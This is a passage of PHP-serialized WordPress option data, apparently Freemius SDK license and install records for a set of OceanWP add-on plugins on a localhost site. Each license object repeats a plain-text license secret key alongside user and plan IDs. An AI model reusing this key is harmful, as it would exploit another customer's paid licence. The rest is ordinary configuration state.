16:43:04\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}}s:23:\"user_id_license_ids_map\";a:15:{i:3752;a:1:{i:2372438;a:0:{}}i:3810;a:1:{i:2372438;a:0:{}}i:3814;a:1:{i:2372438;a:0:{}}i:3813;a:1:{i:2372438;a:0:{}}i:3807;a:1:{i:2372438;a:0:{}}i:3755;a:1:{i:2372438;a:1:{i:0;i:250661;}}i:3762;a:1:{i:2372438;a:1:{i:0;i:250664;}}i:3756;a:1:{i:2372438;a:1:{i:0;i:250666;}}i:3764;a:1:{i:2372438;a:1:{i:0;i:250672;}}i:3758;a:1:{i:2372438;a:1:{i:0;i:250673;}}i:3766;a:1:{i:2372438;a:1:{i:0;i:250674;}}i:3754;a:1:{i:2372438;a:1:{i:0;i:250677;}}i:3757;a:1:{i:2372438;a:1:{i:0;i:250680;}}i:3765;a:1:{i:2372438;a:1:{i:0;i:250681;}}i:3797;a:1:{i:2372438;a:1:{i:0;i:250683;}}}s:12:\"all_licenses\";a:15:{i:3752;a:0:{}i:3810;a:0:{}i:3814;a:0:{}i:3813;a:0:{}i:3807;a:0:{}i:3755;a:1:{i:0;O:17:\"FS_Plugin_License\":21:{s:9:\"plugin_id\";s:4:\"3755\";s:7:\"user_id\";s:7:\"2214433\";s:7:\"plan_id\";s:4:\"6078\";s:16:\"parent_plan_name\";s:3:\"pro\";s:17:\"parent_plan_title\";s:3:\"Pro\";s:17:\"parent_license_id\";s:6:\"250655\";s:8:\"products\";N;s:10:\"pricing_id\";s:4:\"5286\";s:5:\"quota\";i:1;s:9:\"activated\";i:0;s:15:\"activated_local\";i:1;s:10:\"expiration\";s:19:\"2020-11-09 13:32:20\";s:10:\"secret_key\";s:32:\"sk_~skISlRmL5l~[>$]%H^%>78.!z1qQ\";s:15:\"is_whitelabeled\";b:0;s:17:\"is_free_localhost\";b:1;s:17:\"is_block_features\";b:0;s:12:\"is_cancelled\";b:0;s:2:\"id\";s:6:\"250661\";s:7:\"updated\";s:19:\"2019-11-08 13:42:39\";s:7:\"created\";s:19:\"2019-11-08 13:42:39\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}i:3762;a:1:{i:0;O:17:\"FS_Plugin_License\":21:{s:9:\"plugin_id\";s:4:\"3762\";s:7:\"user_id\";s:7:\"2214433\";s:7:\"plan_id\";s:4:\"6071\";s:16:\"parent_plan_name\";s:3:\"pro\";s:17:\"parent_plan_title\";s:3:\"Pro\";s:17:\"parent_license_id\";s:6:\"250655\";s:8:\"products\";N;s:10:\"pricing_id\";s:4:\"5290\";s:5:\"quota\";i:1;s:9:\"activated\";i:0;s:15:\"activated_local\";i:1;s:10:\"expiration\";s:19:\"2020-11-09 13:32:20\";s:10:\"secret_key\";s:32:\"sk_~skISlRmL5l~[>$]%H^%>78.!z1qQ\";s:15:\"is_whitelabeled\";b:0;s:17:\"is_free_localhost\";b:1;s:17:\"is_block_features\";b:0;s:12:\"is_cancelled\";b:0;s:2:\"id\";s:6:\"250664\";s:7:\"updated\";s:19:\"2019-11-08 13:48:48\";s:7:\"created\";s:19:\"2019-11-08 13:48:48\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}i:3756;a:1:{i:0;O:17:\"FS_Plugin_License\":21:{s:9:\"plugin_id\";s:4:\"3756\";s:7:\"user_id\";s:7:\"2214433\";s:7:\"plan_id\";s:4:\"6077\";s:16:\"parent_plan_name\";s:3:\"pro\";s:17:\"parent_plan_title\";s:3:\"Pro\";s:17:\"parent_license_id\";s:6:\"250655\";s:8:\"products\";N;s:10:\"pricing_id\";s:4:\"5285\";s:5:\"quota\";i:1;s:9:\"activated\";i:0;s:15:\"activated_local\";i:1;s:10:\"expiration\";s:19:\"2020-11-09 13:32:20\";s:10:\"secret_key\";s:32:\"sk_~skISlRmL5l~[>$]%H^%>78.!z1qQ\";s:15:\"is_whitelabeled\";b:0;s:17:\"is_free_localhost\";b:1;s:17:\"is_block_features\";b:0;s:12:\"is_cancelled\";b:0;s:2:\"id\";s:6:\"250666\";s:7:\"updated\";s:19:\"2019-11-08 13:50:46\";s:7:\"created\";s:19:\"2019-11-08 13:50:46\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}i:3764;a:1:{i:0;O:17:\"FS_Plugin_License\":21:{s:9:\"plugin_id\";s:4:\"3764\";s:7:\"user_id\";s:7:\"2214433\";s:7:\"plan_id\";s:4:\"6069\";s:16:\"parent_plan_name\";s:3:\"pro\";s:17:\"parent_plan_title\";s:3:\"Pro\";s:17:\"parent_license_id\";s:6:\"250655\";s:8:\"products\";N;s:10:\"pricing_id\";s:4:\"5278\";s:5:\"quota\";i:1;s:9:\"activated\";i:0;s:15:\"activated_local\";i:1;s:10:\"expiration\";s:19:\"2020-11-09 13:32:20\";s:10:\"secret_key\";s:32:\"sk_~skISlRmL5l~[>$]%H^%>78.!z1qQ\";s:15:\"is_whitelabeled\";b:0;s:17:\"is_free_localhost\";b:1;s:17:\"is_block_features\";b:0;s:12:\"is_cancelled\";b:0;s:2:\"id\";s:6:\"250672\";s:7:\"updated\";s:19:\"2019-11-08 13:57:31\";s:7:\"created\";s:19:\"2019-11-08 13:57:31\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}i:3758;a:1:{i:0;O:17:\"FS_Plugin_License\":21:{s:9:\"plugin_id\";s:4:\"3758\";s:7:\"user_id\";s:7:\"2214433\";s:7:\"plan_id\";s:4:\"6075\";s:16:\"parent_plan_name\";s:3:\"pro\";s:17:\"parent_plan_title\";s:3:\"Pro\";s:17:\"parent_license_id\";s:6:\"250655\";s:8:\"products\";N;s:10:\"pricing_id\";s:4:\"5283\";s:5:\"quota\";i:1;s:9:\"activated\";i:0;s:15:\"activated_local\";i:0;s:10:\"expiration\";s:19:\"2020-11-09 13:32:20\";s:10:\"secret_key\";s:32:\"sk_~skISlRmL5l~[>$]%H^%>78.!z1qQ\";s:15:\"is_whitelabeled\";b:0;s:17:\"is_free_localhost\";b:1;s:17:\"is_block_features\";b:0;s:12:\"is_cancelled\";b:0;s:2:\"id\";s:6:\"250673\";s:7:\"updated\";s:19:\"2019-11-11 17:56:21\";s:7:\"created\";s:19:\"2019-11-08 13:58:43\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}i:3766;a:1:{i:0;O:17:\"FS_Plugin_License\":21:{s:9:\"plugin_id\";s:4:\"3766\";s:7:\"user_id\";s:7:\"2214433\";s:7:\"plan_id\";s:4:\"6067\";s:16:\"parent_plan_name\";s:3:\"pro\";s:17:\"parent_plan_title\";s:3:\"Pro\";s:17:\"parent_license_id\";s:6:\"250655\";s:8:\"products\";N;s:10:\"pricing_id\";s:4:\"5276\";s:5:\"quota\";i:1;s:9:\"activated\";i:0;s:15:\"activated_local\";i:1;s:10:\"expiration\";s:19:\"2020-11-09 13:32:20\";s:10:\"secret_key\";s:32:\"sk_~skISlRmL5l~[>$]%H^%>78.!z1qQ\";s:15:\"is_whitelabeled\";b:0;s:17:\"is_free_localhost\";b:1;s:17:\"is_block_features\";b:0;s:12:\"is_cancelled\";b:0;s:2:\"id\";s:6:\"250674\";s:7:\"updated\";s:19:\"2019-11-08 14:00:41\";s:7:\"created\";s:19:\"2019-11-08 14:00:41\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}i:3754;a:1:{i:0;O:17:\"FS_Plugin_License\":21:{s:9:\"plugin_id\";s:4:\"3754\";s:7:\"user_id\";s:7:\"2214433\";s:7:\"plan_id\";s:4:\"6079\";s:16:\"parent_plan_name\";s:3:\"pro\";s:17:\"parent_plan_title\";s:3:\"Pro\";s:17:\"parent_license_id\";s:6:\"250655\";s:8:\"products\";N;s:10:\"pricing_id\";s:4:\"5287\";s:5:\"quota\";i:1;s:9:\"activated\";i:0;s:15:\"activated_local\";i:1;s:10:\"expiration\";s:19:\"2020-11-09 13:32:20\";s:10:\"secret_key\";s:32:\"sk_~skISlRmL5l~[>$]%H^%>78.!z1qQ\";s:15:\"is_whitelabeled\";b:0;s:17:\"is_free_localhost\";b:1;s:17:\"is_block_features\";b:0;s:12:\"is_cancelled\";b:0;s:2:\"id\";s:6:\"250677\";s:7:\"updated\";s:19:\"2019-11-08 14:02:01\";s:7:\"created\";s:19:\"2019-11-08 14:02:01\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}i:3757;a:1:{i:0;O:17:\"FS_Plugin_License\":21:{s:9:\"plugin_id\";s:4:\"3757\";s:7:\"user_id\";s:7:\"2214433\";s:7:\"plan_id\";s:4:\"6076\";s:16:\"parent_plan_name\";s:3:\"pro\";s:17:\"parent_plan_title\";s:3:\"Pro\";s:17:\"parent_license_id\";s:6:\"250655\";s:8:\"products\";N;s:10:\"pricing_id\";s:4:\"5284\";s:5:\"quota\";i:1;s:9:\"activated\";i:0;s:15:\"activated_local\";i:1;s:10:\"expiration\";s:19:\"2020-11-09 13:32:20\";s:10:\"secret_key\";s:32:\"sk_~skISlRmL5l~[>$]%H^%>78.!z1qQ\";s:15:\"is_whitelabeled\";b:0;s:17:\"is_free_localhost\";b:1;s:17:\"is_block_features\";b:0;s:12:\"is_cancelled\";b:0;s:2:\"id\";s:6:\"250680\";s:7:\"updated\";s:19:\"2019-11-08 14:03:39\";s:7:\"created\";s:19:\"2019-11-08 14:03:39\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}i:3765;a:1:{i:0;O:17:\"FS_Plugin_License\":21:{s:9:\"plugin_id\";s:4:\"3765\";s:7:\"user_id\";s:7:\"2214433\";s:7:\"plan_id\";s:4:\"6068\";s:16:\"parent_plan_name\";s:3:\"pro\";s:17:\"parent_plan_title\";s:3:\"Pro\";s:17:\"parent_license_id\";s:6:\"250655\";s:8:\"products\";N;s:10:\"pricing_id\";s:4:\"5277\";s:5:\"quota\";i:1;s:9:\"activated\";i:0;s:15:\"activated_local\";i:1;s:10:\"expiration\";s:19:\"2020-11-09 13:32:20\";s:10:\"secret_key\";s:32:\"sk_~skISlRmL5l~[>$]%H^%>78.!z1qQ\";s:15:\"is_whitelabeled\";b:0;s:17:\"is_free_localhost\";b:1;s:17:\"is_block_features\";b:0;s:12:\"is_cancelled\";b:0;s:2:\"id\";s:6:\"250681\";s:7:\"updated\";s:19:\"2019-11-08 14:05:12\";s:7:\"created\";s:19:\"2019-11-08 14:05:12\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}i:3797;a:1:{i:0;O:17:\"FS_Plugin_License\":21:{s:9:\"plugin_id\";s:4:\"3797\";s:7:\"user_id\";s:7:\"2214433\";s:7:\"plan_id\";s:4:\"6115\";s:16:\"parent_plan_name\";s:3:\"pro\";s:17:\"parent_plan_title\";s:3:\"Pro\";s:17:\"parent_license_id\";s:6:\"250655\";s:8:\"products\";N;s:10:\"pricing_id\";s:4:\"5380\";s:5:\"quota\";i:1;s:9:\"activated\";i:0;s:15:\"activated_local\";i:1;s:10:\"expiration\";s:19:\"2020-11-09 13:32:20\";s:10:\"secret_key\";s:32:\"sk_~skISlRmL5l~[>$]%H^%>78.!z1qQ\";s:15:\"is_whitelabeled\";b:0;s:17:\"is_free_localhost\";b:1;s:17:\"is_block_features\";b:0;s:12:\"is_cancelled\";b:0;s:2:\"id\";s:6:\"250683\";s:7:\"updated\";s:19:\"2019-11-08 14:06:59\";s:7:\"created\";s:19:\"2019-11-08 14:06:59\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}}s:11:\"plugin_data\";a:16:{s:20:\"ocean-custom-sidebar\";a:20:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:45:\"ocean-custom-sidebar/ocean-custom-sidebar.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1573218097;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:16:\"sdk_last_version\";N;s:11:\"sdk_version\";s:7:\"2.3.0.4\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";N;s:14:\"plugin_version\";s:5:\"1.0.5\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:9:\"localhost\";s:9:\"server_ip\";s:3:\"::1\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1573218097;s:7:\"version\";s:5:\"1.0.5\";}s:14:\"has_trial_plan\";b:0;s:22:\"install_sync_timestamp\";i:1573773390;s:19:\"keepalive_timestamp\";i:1573773390;s:15:\"prev_is_premium\";b:0;s:14:\"sync_timestamp\";i:1573748439;s:16:\"uninstall_reason\";O:8:\"stdClass\":3:{s:2:\"id\";s:1:\"1\";s:4:\"info\";s:0:\"\";s:12:\"is_anonymous\";b:0;}}s:18:\"ocean-modal-window\";a:20:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:41:\"ocean-modal-window/ocean-modal-window.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1573218097;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:16:\"sdk_last_version\";s:7:\"2.4.0.1\";s:11:\"sdk_version\";s:5:\"2.4.1\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";s:6:\"1.0.14\";s:14:\"plugin_version\";s:5:\"1.1.0\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:9:\"localhost\";s:9:\"server_ip\";s:3:\"::1\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1573218097;s:7:\"version\";s:6:\"1.0.14\";}s:14:\"has_trial_plan\";b:0;s:19:\"keepalive_timestamp\";i:1609715677;s:15:\"prev_is_premium\";b:0;s:9:\"sync_cron\";O:8:\"stdClass\":5:{s:7:\"version\";s:6:\"1.0.14\";s:7:\"blog_id\";i:0;s:11:\"sdk_version\";s:7:\"2.3.0.4\";s:9:\"timestamp\";i:1573218133;s:2:\"on\";b:1;}s:14:\"sync_timestamp\";i:1609715677;s:22:\"install_sync_timestamp\";i:1609715677;}s:18:\"ocean-posts-slider\";a:20:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:41:\"ocean-posts-slider/ocean-posts-slider.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1573218097;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:16:\"sdk_last_version\";s:5:\"2.4.1\";s:11:\"sdk_version\";s:5:\"2.4.2\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";s:5:\"1.1.1\";s:14:\"plugin_version\";s:5:\"2.0.0\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:9:\"localhost\";s:9:\"server_ip\";s:3:\"::1\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1573218097;s:7:\"version\";s:6:\"1.0.13\";}s:14:\"has_trial_plan\";b:0;s:19:\"keepalive_timestamp\";i:1628986046;s:15:\"prev_is_premium\";b:0;s:9:\"sync_cron\";O:8:\"stdClass\":5:{s:7:\"version\";s:6:\"1.0.13\";s:7:\"blog_id\";i:0;s:11:\"sdk_version\";s:7:\"2.3.0.4\";s:9:\"timestamp\";i:1573218133;s:2:\"on\";b:1;}s:14:\"sync_timestamp\";i:1628986046;s:22:\"install_sync_timestamp\";i:1628986046;}s:20:\"ocean-social-sharing\";a:20:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:45:\"ocean-social-sharing/ocean-social-sharing.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1573218097;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:16:\"sdk_last_version\";s:5:\"2.4.1\";s:11:\"sdk_version\";s:5:\"2.4.2\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";s:5:\"1.1.1\";s:14:\"plugin_version\";s:5:\"2.0.0\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:9:\"localhost\";s:9:\"server_ip\";s:3:\"::1\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1573218097;s:7:\"version\";s:6:\"1.0.15\";}s:14:\"has_trial_plan\";b:0;s:19:\"keepalive_timestamp\";i:1629035899;s:15:\"prev_is_premium\";b:0;s:9:\"sync_cron\";O:8:\"stdClass\":5:{s:7:\"version\";s:6:\"1.0.15\";s:7:\"blog_id\";i:0;s:11:\"sdk_version\";s:7:\"2.3.0.4\";s:9:\"timestamp\";i:1573218133;s:2:\"on\";b:1;}s:14:\"sync_timestamp\";i:1629035899;s:22:\"install_sync_timestamp\";i:1629035899;}s:19:\"ocean-sticky-header\";a:23:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:43:\"ocean-sticky-header/ocean-sticky-header.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1573220510;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:16:\"sdk_last_version\";s:5:\"2.4.1\";s:11:\"sdk_version\";s:5:\"2.4.2\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";s:6:\"1.1.11\";s:14:\"plugin_version\";s:5:\"1.2.0\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:9:\"localhost\";s:9:\"server_ip\";s:3:\"::1\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1573220510;s:7:\"version\";s:6:\"1.1.11\";}s:15:\"prev_is_premium\";b:1;s:22:\"install_sync_timestamp\";i:1629078403;s:19:\"keepalive_timestamp\";i:1629078403;s:14:\"has_trial_plan\";b:0;s:14:\"sync_timestamp\";i:1629078403;s:9:\"beta_data\";a:2:{s:7:\"is_beta\";b:0;s:7:\"version\";s:5:\"2.0.1\";}s:16:\"uninstall_reason\";O:8:\"stdClass\":3:{s:2:\"id\";s:1:\"3\";s:4:\"info\";s:0:\"\";s:12:\"is_anonymous\";b:0;}s:9:\"sync_cron\";O:8:\"stdClass\":5:{s:7:\"version\";s:6:\"1.1.11\";s:7:\"blog_id\";i:0;s:11:\"sdk_version\";s:7:\"2.3.0.4\";s:9:\"timestamp\";i:1574555327;s:2:\"on\";b:1;}s:28:\"expired_license_notice_shown\";i:1628992256;}s:17:\"ocean-white-label\";a:22:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:39:\"ocean-white-label/ocean-white-label.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1573220897;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:16:\"sdk_last_version\";s:5:\"2.4.1\";s:11:\"sdk_version\";s:5:\"2.4.2\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";s:5:\"1.0.5\";s:14:\"plugin_version\";s:5:\"1.0.6\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:9:\"localhost\";s:9:\"server_ip\";s:3:\"::1\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1573220897;s:7:\"version\";s:5:\"1.0.5\";}s:15:\"prev_is_premium\";b:1;s:22:\"install_sync_timestamp\";i:1628983657;s:19:\"keepalive_timestamp\";i:1628983657;s:14:\"has_trial_plan\";b:0;s:9:\"sync_cron\";O:8:\"stdClass\":5:{s:7:\"version\";s:5:\"1.0.5\";s:7:\"blog_id\";i:0;s:11:\"sdk_version\";s:7:\"2.3.0.4\";s:9:\"timestamp\";i:1573220932;s:2:\"on\";b:1;}s:14:\"sync_timestamp\";i:1628983657;s:9:\"beta_data\";a:2:{s:7:\"is_beta\";b:0;s:7:\"version\";s:5:\"1.0.6\";}s:28:\"expired_license_notice_shown\";i:1628897289;}s:16:\"ocean-side-panel\";a:19:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:37:\"ocean-side-panel/ocean-side-panel.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1573221022;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:16:\"sdk_last_version\";N;s:11:\"sdk_version\";s:7:\"2.3.0.4\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";N;s:14:\"plugin_version\";s:6:\"1.0.11\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:9:\"localhost\";s:9:\"server_ip\";s:3:\"::1\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1573221022;s:7:\"version\";s:6:\"1.0.11\";}s:15:\"prev_is_premium\";b:1;s:22:\"install_sync_timestamp\";i:1573495020;s:19:\"keepalive_timestamp\";i:1573495020;s:14:\"has_trial_plan\";b:0;s:16:\"uninstall_reason\";O:8:\"stdClass\":3:{s:2:\"id\";s:1:\"1\";s:4:\"info\";s:0:\"\";s:12:\"is_anonymous\";b:0;}}s:17:\"ocean-popup-login\";a:23:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:39:\"ocean-popup-login/ocean-popup-login.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1573221426;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:16:\"sdk_last_version\";s:5:\"2.4.1\";s:11:\"sdk_version\";s:5:\"2.4.2\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";s:5:\"1.0.8\";s:14:\"plugin_version\";s:5:\"1.2.0\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:9:\"localhost\";s:9:\"server_ip\";s:3:\"::1\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1573221426;s:7:\"version\";s:5:\"1.0.8\";}s:15:\"prev_is_premium\";b:1;s:22:\"install_sync_timestamp\";i:1629077026;s:19:\"keepalive_timestamp\";i:1629077026;s:14:\"has_trial_plan\";b:0;s:14:\"sync_timestamp\";i:1629077026;s:9:\"beta_data\";a:2:{s:7:\"is_beta\";b:0;s:7:\"version\";s:5:\"2.0.0\";}s:16:\"uninstall_reason\";O:8:\"stdClass\":3:{s:2:\"id\";s:1:\"3\";s:4:\"info\";s:0:\"\";s:12:\"is_anonymous\";b:0;}s:9:\"sync_cron\";O:8:\"stdClass\":5:{s:7:\"version\";s:5:\"1.0.8\";s:7:\"blog_id\";i:0;s:11:\"sdk_version\";s:7:\"2.3.0.4\";s:9:\"timestamp\";i:1574555378;s:2:\"on\";b:1;}s:28:\"expired_license_notice_shown\";i:1628990687;}s:11:\"ocean-hooks\";a:22:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:27:\"ocean-hooks/ocean-hooks.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1573221495;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:16:\"sdk_last_version\";N;s:11:\"sdk_version\";s:7:\"2.3.0.4\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";N;s:14:\"plugin_version\";s:5:\"1.1.2\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:9:\"localhost\";s:9:\"server_ip\";s:3:\"::1\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1573221495;s:7:\"version\";s:5:\"1.1.2\";}s:15:\"prev_is_premium\";b:1;s:22:\"install_sync_timestamp\";i:1574209471;s:19:\"keepalive_timestamp\";i:1574209471;s:14:\"has_trial_plan\";b:0;s:14:\"sync_timestamp\";i:1573946559;s:9:\"beta_data\";a:2:{s:7:\"is_beta\";b:0;s:7:\"version\";s:5:\"1.1.2\";}s:16:\"uninstall_reason\";O:8:\"stdClass\":3:{s:2:\"id\";s:1:\"1\";s:4:\"info\";s:0:\"\";s:12:\"is_anonymous\";b:0;}s:15:\"is_whitelabeled\";b:0;}s:17:\"ocean-full-screen\";a:21:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:39:\"ocean-full-screen/ocean-full-screen.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1573221618;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:16:\"sdk_last_version\";N;s:11:\"sdk_version\";s:7:\"2.3.0.4\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";N;s:14:\"plugin_version\";s:5:\"1.0.6\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:9:\"localhost\";s:9:\"server_ip\";s:3:\"::1\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1573221618;s:7:\"version\";s:5:\"1.0.6\";}s:15:\"prev_is_premium\";b:1;s:22:\"install_sync_timestamp\";i:1573494994;s:19:\"keepalive_timestamp\";i:1573494994;s:14:\"has_trial_plan\";b:0;s:14:\"sync_timestamp\";i:1573432870;s:9:\"beta_data\";a:2:{s:7:\"is_beta\";b:0;s:7:\"version\";s:5:\"1.0.6\";}s:16:\"uninstall_reason\";O:8:\"stdClass\":3:{s:2:\"id\";s:1:\"1\";s:4:\"info\";s:0:\"\";s:12:\"is_anonymous\";b:0;}}s:20:\"ocean-footer-callout\";a:19:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:45:\"ocean-footer-callout/ocean-footer-callout.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1573221686;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:16:\"sdk_last_version\";N;s:11:\"sdk_version\";s:7:\"2.3.0.4\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";N;s:14:\"plugin_version\";s:6:\"1.0.13\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:9:\"localhost\";s:9:\"server_ip\";s:3:\"::1\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1573221686;s:7:\"version\";s:6:\"1.0.13\";}s:15:\"prev_is_premium\";b:1;s:22:\"install_sync_timestamp\";i:1573489480;s:19:\"keepalive_timestamp\";i:1573489480;s:14:\"has_trial_plan\";b:0;s:16:\"uninstall_reason\";O:8:\"stdClass\":3:{s:2:\"id\";s:2:\"11\";s:4:\"info\";s:0:\"\";s:12:\"is_anonymous\";b:0;}}s:23:\"ocean-elementor-widgets\";a:23:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:51:\"ocean-elementor-widgets/ocean-elementor-widgets.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1573221791;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:16:\"sdk_last_version\";s:5:\"2.4.1\";s:11:\"sdk_version\";s:5:\"2.4.2\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";s:5:\"1.1.9\";s:14:\"plugin_version\";s:5:\"1.2.3\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:9:\"localhost\";s:9:\"server_ip\";s:3:\"::1\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1573221791;s:7:\"version\";s:5:\"1.1.9\";}s:15:\"prev_is_premium\";b:1;s:22:\"install_sync_timestamp\";i:1629112252;s:19:\"keepalive_timestamp\";i:1629112252;s:14:\"has_trial_plan\";b:0;s:14:\"sync_timestamp\";i:1629112252;s:9:\"beta_data\";a:2:{s:7:\"is_beta\";b:0;s:7:\"version\";s:5:\"2.0.2\";}s:16:\"uninstall_reason\";O:8:\"stdClass\":3:{s:2:\"id\";s:1:\"1\";s:4:\"info\";s:0:\"\";s:12:\"is_anonymous\";b:0;}s:9:\"sync_cron\";O:8:\"stdClass\":5:{s:7:\"version\";s:5:\"1.1.9\";s:7:\"blog_id\";i:0;s:11:\"sdk_version\";s:7:\"2.3.0.4\";s:9:\"timestamp\";i:1574555248;s:2:\"on\";b:1;}s:28:\"expired_license_notice_shown\";i:1628827808;}s:19:\"ocean